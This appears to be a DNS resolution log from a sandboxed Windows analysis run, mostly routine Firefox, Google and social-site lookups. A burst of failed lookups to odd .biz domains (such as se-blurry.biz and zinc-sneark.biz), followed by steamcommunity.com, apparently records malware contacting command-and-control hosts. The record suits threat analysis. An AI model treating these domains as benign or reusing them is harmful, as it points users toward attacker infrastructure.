Dec 14, 2024 12:56:32.086508989 CET	1.1.1.1	192.168.2.4	0x9010	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:32.224982023 CET	1.1.1.1	192.168.2.4	0x88c8	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:32.339864016 CET	1.1.1.1	192.168.2.4	0x3972	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:56:32.339864016 CET	1.1.1.1	192.168.2.4	0x3972	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:32.365299940 CET	1.1.1.1	192.168.2.4	0xc2	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 14, 2024 12:56:32.506046057 CET	1.1.1.1	192.168.2.4	0xe84	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:32.613837957 CET	1.1.1.1	192.168.2.4	0xa7e6	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:32.643851042 CET	1.1.1.1	192.168.2.4	0x9a61	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 14, 2024 12:56:32.665857077 CET	1.1.1.1	192.168.2.4	0x7d2f	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:56:32.665857077 CET	1.1.1.1	192.168.2.4	0x7d2f	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:40.609334946 CET	1.1.1.1	192.168.2.4	0xb951	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:40.613089085 CET	1.1.1.1	192.168.2.4	0xcb6d	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 14, 2024 12:56:52.361356974 CET	1.1.1.1	192.168.2.4	0x9224	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:56:52.361356974 CET	1.1.1.1	192.168.2.4	0x9224	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:54.658849001 CET	1.1.1.1	192.168.2.4	0xdab8	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:54.797334909 CET	1.1.1.1	192.168.2.4	0x94d2	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:54.797334909 CET	1.1.1.1	192.168.2.4	0x94d2	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:55.967441082 CET	1.1.1.1	192.168.2.4	0xfc95	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:55.967461109 CET	1.1.1.1	192.168.2.4	0x62cc	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:56:55.967461109 CET	1.1.1.1	192.168.2.4	0x62cc	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:55.984795094 CET	1.1.1.1	192.168.2.4	0x1385	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:56:55.984795094 CET	1.1.1.1	192.168.2.4	0x1385	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:55.992361069 CET	1.1.1.1	192.168.2.4	0x141f	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:56.107142925 CET	1.1.1.1	192.168.2.4	0xfa5b	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:56.123367071 CET	1.1.1.1	192.168.2.4	0xdb35	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:56.491980076 CET	1.1.1.1	192.168.2.4	0x25e9	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:56:56.491980076 CET	1.1.1.1	192.168.2.4	0x25e9	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:56:56.491980076 CET	1.1.1.1	192.168.2.4	0x25e9	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:56.631154060 CET	1.1.1.1	192.168.2.4	0xe373	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:56:56.769356012 CET	1.1.1.1	192.168.2.4	0x1ba	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Dec 14, 2024 12:57:02.434271097 CET	1.1.1.1	192.168.2.4	0x544	Name error (3)	se-blurry.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:02.666383028 CET	1.1.1.1	192.168.2.4	0x2d49	Name error (3)	zinc-sneark.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:02.900432110 CET	1.1.1.1	192.168.2.4	0x5aff	Name error (3)	dwell-exclaim.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:03.136074066 CET	1.1.1.1	192.168.2.4	0x5882	Name error (3)	formy-spill.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:03.375236988 CET	1.1.1.1	192.168.2.4	0x929e	Name error (3)	covery-mover.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:03.602202892 CET	1.1.1.1	192.168.2.4	0xe39e	Name error (3)	dare-curbys.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:03.835488081 CET	1.1.1.1	192.168.2.4	0x52fd	Name error (3)	print-vexer.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359118938 CET	1.1.1.1	192.168.2.4	0xcbb7	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359118938 CET	1.1.1.1	192.168.2.4	0xcbb7	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359560966 CET	1.1.1.1	192.168.2.4	0x13fc	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359560966 CET	1.1.1.1	192.168.2.4	0x13fc	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359606028 CET	1.1.1.1	192.168.2.4	0xc088	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359606028 CET	1.1.1.1	192.168.2.4	0xc088	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359606028 CET	1.1.1.1	192.168.2.4	0xc088	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359606028 CET	1.1.1.1	192.168.2.4	0xc088	No error (0)	youtube-ui.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359606028 CET	1.1.1.1	192.168.2.4	0xc088	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359606028 CET	1.1.1.1	192.168.2.4	0xc088	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359606028 CET	1.1.1.1	192.168.2.4	0xc088	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359606028 CET	1.1.1.1	192.168.2.4	0xc088	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359606028 CET	1.1.1.1	192.168.2.4	0xc088	No error (0)	youtube-ui.l.google.com		172.217.19.14	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359606028 CET	1.1.1.1	192.168.2.4	0xc088	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.359606028 CET	1.1.1.1	192.168.2.4	0xc088	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.509860992 CET	1.1.1.1	192.168.2.4	0xd4e5	Name error (3)	impend-differ.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.649852037 CET	1.1.1.1	192.168.2.4	0x1886	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.851871967 CET	1.1.1.1	192.168.2.4	0x96ce	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.851916075 CET	1.1.1.1	192.168.2.4	0xa30b	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.851916075 CET	1.1.1.1	192.168.2.4	0xa30b	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.851916075 CET	1.1.1.1	192.168.2.4	0xa30b	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.851916075 CET	1.1.1.1	192.168.2.4	0xa30b	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.851916075 CET	1.1.1.1	192.168.2.4	0xa30b	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.851916075 CET	1.1.1.1	192.168.2.4	0xa30b	No error (0)	youtube-ui.l.google.com		172.217.19.14	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.851916075 CET	1.1.1.1	192.168.2.4	0xa30b	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.851916075 CET	1.1.1.1	192.168.2.4	0xa30b	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.851916075 CET	1.1.1.1	192.168.2.4	0xa30b	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.851916075 CET	1.1.1.1	192.168.2.4	0xa30b	No error (0)	youtube-ui.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.932374954 CET	1.1.1.1	192.168.2.4	0x1b0f	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:04.991705894 CET	1.1.1.1	192.168.2.4	0x3a2d	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Dec 14, 2024 12:57:04.992465019 CET	1.1.1.1	192.168.2.4	0xc2e1	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 12:57:04.992465019 CET	1.1.1.1	192.168.2.4	0xc2e1	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 12:57:04.992465019 CET	1.1.1.1	192.168.2.4	0xc2e1	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 12:57:04.992465019 CET	1.1.1.1	192.168.2.4	0xc2e1	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 12:57:05.046411991 CET	1.1.1.1	192.168.2.4	0x998e	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:05.137496948 CET	1.1.1.1	192.168.2.4	0x73b1	No error (0)	twitter.com		104.244.42.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.138324022 CET	1.1.1.1	192.168.2.4	0x94b8	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:05.138324022 CET	1.1.1.1	192.168.2.4	0x94b8	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.138324022 CET	1.1.1.1	192.168.2.4	0x94b8	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.138324022 CET	1.1.1.1	192.168.2.4	0x94b8	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.138324022 CET	1.1.1.1	192.168.2.4	0x94b8	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.167217016 CET	1.1.1.1	192.168.2.4	0x600	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Dec 14, 2024 12:57:05.357800007 CET	1.1.1.1	192.168.2.4	0x7994	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.357800007 CET	1.1.1.1	192.168.2.4	0x7994	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.357800007 CET	1.1.1.1	192.168.2.4	0x7994	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.357800007 CET	1.1.1.1	192.168.2.4	0x7994	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:05.371575117 CET	1.1.1.1	192.168.2.4	0xb509	No error (0)	twitter.com		104.244.42.193	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:21.830609083 CET	1.1.1.1	192.168.2.4	0xa035	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:21.830640078 CET	1.1.1.1	192.168.2.4	0xdfdf	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 14, 2024 12:57:26.497852087 CET	1.1.1.1	192.168.2.4	0x651a	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:26.497852087 CET	1.1.1.1	192.168.2.4	0x651a	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:26.497852087 CET	1.1.1.1	192.168.2.4	0x651a	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:26.638099909 CET	1.1.1.1	192.168.2.4	0xaf40	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.499089003 CET	1.1.1.1	192.168.2.4	0x8e91	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:28.499089003 CET	1.1.1.1	192.168.2.4	0x8e91	No error (0)	plus.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.500588894 CET	1.1.1.1	192.168.2.4	0x5147	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:28.611167908 CET	1.1.1.1	192.168.2.4	0x10c2	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:28.611167908 CET	1.1.1.1	192.168.2.4	0x10c2	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.734074116 CET	1.1.1.1	192.168.2.4	0xd61e	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.736512899 CET	1.1.1.1	192.168.2.4	0x7763	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:28.736512899 CET	1.1.1.1	192.168.2.4	0x7763	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.737092018 CET	1.1.1.1	192.168.2.4	0x8078	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.739891052 CET	1.1.1.1	192.168.2.4	0xa097	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.751077890 CET	1.1.1.1	192.168.2.4	0x9b91	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:28.881552935 CET	1.1.1.1	192.168.2.4	0x25e6	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.035351992 CET	1.1.1.1	192.168.2.4	0xc3dd	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.073163033 CET	1.1.1.1	192.168.2.4	0x2c5f	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.073163033 CET	1.1.1.1	192.168.2.4	0x2c5f	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.073163033 CET	1.1.1.1	192.168.2.4	0x2c5f	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.073163033 CET	1.1.1.1	192.168.2.4	0x2c5f	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.211971045 CET	1.1.1.1	192.168.2.4	0xbad9	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.211971045 CET	1.1.1.1	192.168.2.4	0xbad9	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.211971045 CET	1.1.1.1	192.168.2.4	0xbad9	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.211971045 CET	1.1.1.1	192.168.2.4	0xbad9	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:29.351435900 CET	1.1.1.1	192.168.2.4	0x203e	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 14, 2024 12:57:29.351435900 CET	1.1.1.1	192.168.2.4	0x203e	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 14, 2024 12:57:29.351435900 CET	1.1.1.1	192.168.2.4	0x203e	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 14, 2024 12:57:29.351435900 CET	1.1.1.1	192.168.2.4	0x203e	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 14, 2024 12:57:30.006721020 CET	1.1.1.1	192.168.2.4	0x7439	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:32.364537954 CET	1.1.1.1	192.168.2.4	0x6e36	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:32.364537954 CET	1.1.1.1	192.168.2.4	0x6e36	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:32.364639997 CET	1.1.1.1	192.168.2.4	0x6e36	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:32.364639997 CET	1.1.1.1	192.168.2.4	0x6e36	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:36.727065086 CET	1.1.1.1	192.168.2.4	0x98eb	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:36.727065086 CET	1.1.1.1	192.168.2.4	0x98eb	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:47.036024094 CET	1.1.1.1	192.168.2.4	0xdb22	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:57:48.310633898 CET	1.1.1.1	192.168.2.4	0x9ff6	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:57:48.310633898 CET	1.1.1.1	192.168.2.4	0x9ff6	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:58:49.681693077 CET	1.1.1.1	192.168.2.4	0x72cf	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:58:51.053015947 CET	1.1.1.1	192.168.2.4	0xa957	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:58:51.053015947 CET	1.1.1.1	192.168.2.4	0xa957	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:59:48.722055912 CET	1.1.1.1	192.168.2.4	0xf892	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 12:59:50.193625927 CET	1.1.1.1	192.168.2.4	0xc611	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 12:59:50.193625927 CET	1.1.1.1	192.168.2.4	0xc611	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:11.073252916 CET	1.1.1.1	192.168.2.4	0x25ed	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:11.212902069 CET	1.1.1.1	192.168.2.4	0x60e7	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:46.752193928 CET	1.1.1.1	192.168.2.4	0xc029	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 14, 2024 13:00:47.011256933 CET	1.1.1.1	192.168.2.4	0x7dae	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:00:47.011256933 CET	1.1.1.1	192.168.2.4	0x7dae	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.092437029 CET	1.1.1.1	192.168.2.4	0x1b	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:00:47.092437029 CET	1.1.1.1	192.168.2.4	0x1b	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.117861032 CET	1.1.1.1	192.168.2.4	0xc424	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:00:47.117861032 CET	1.1.1.1	192.168.2.4	0xc424	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.122977972 CET	1.1.1.1	192.168.2.4	0xd485	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.132999897 CET	1.1.1.1	192.168.2.4	0x4cdd	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.145023108 CET	1.1.1.1	192.168.2.4	0xf5bf	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:00:47.145023108 CET	1.1.1.1	192.168.2.4	0xf5bf	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.230583906 CET	1.1.1.1	192.168.2.4	0x2488	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:00:47.257889032 CET	1.1.1.1	192.168.2.4	0x2b46	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.275082111 CET	1.1.1.1	192.168.2.4	0xb54f	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:47.373727083 CET	1.1.1.1	192.168.2.4	0x7f4c	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:48.069217920 CET	1.1.1.1	192.168.2.4	0xd965	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:48.367655993 CET	1.1.1.1	192.168.2.4	0xf126	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:00:48.367655993 CET	1.1.1.1	192.168.2.4	0xf126	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:48.571147919 CET	1.1.1.1	192.168.2.4	0x9ddd	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.030503035 CET	1.1.1.1	192.168.2.4	0x4b18	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:00:50.030503035 CET	1.1.1.1	192.168.2.4	0x4b18	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.032716036 CET	1.1.1.1	192.168.2.4	0x1415	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:00:50.032716036 CET	1.1.1.1	192.168.2.4	0x1415	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.035744905 CET	1.1.1.1	192.168.2.4	0xdd5d	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.035744905 CET	1.1.1.1	192.168.2.4	0xdd5d	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.035744905 CET	1.1.1.1	192.168.2.4	0xdd5d	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.035744905 CET	1.1.1.1	192.168.2.4	0xdd5d	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
